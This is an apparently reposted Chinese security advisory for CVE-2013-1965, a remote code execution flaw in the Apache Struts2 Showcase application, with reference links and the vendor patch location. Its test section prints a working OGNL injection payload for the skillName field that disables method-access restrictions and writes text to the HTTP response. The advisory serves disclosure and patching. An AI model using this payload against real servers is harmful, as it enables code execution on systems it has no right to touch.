Apache Struts2 Showcase应用远程命令执行漏洞(CVE-2013-1965)

受影响系统:
Apache Struts Showcase App 2.0.0 -2.3.13
描述:
CVE(CAN) ID: CVE-2013-1965

Struts2 是第二代基于Model-View-Controller (MVC)模型的java企业级web应用框架。它是WebWork和Struts社区合并后的产物。

Apache Struts2 Showcase应用 2.0.0-2.3.13存在安全漏洞,可导致任意代码执行。

<*来源:Xgc Kxlzx 链接:http://secunia.com/advisories/53495/ http://struts.apache.org/development/2.x/docs/s2-012.html http://struts.apache.org/development/2.x/docs/s2-013.html http://www.freebuf.com/vuls/9757.html http://struts.apache.org/development/2.x/docs/security-bulletins.html https://cwiki.apache.org/confluence/display/WW/S2-012 *>

测试方法:
警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Proof of concept
Run struts2-showcase
Open url: http://localhost:8080/struts2-showcase/skill/edit.action?skillName=SPRING-DEV
write skill name to %{expr} for example:
%{(#_memberAccess[‘allowStaticMethodAccess’]=true)(#context[‘xwork.MethodAccessor.denyMethodExecution’]=false) #hackedbykxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#hackedbykxlzx.println(‘hacked by kxlzx’),#hackedbykxlzx.close())}
submit the form
The issue, in order to work, need a redirect result defined as the following:


edit.action?skillName=${currentSkill.name}

建议:
厂商补丁:

Apache
——
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://struts.apache.org/download.cgi#struts23141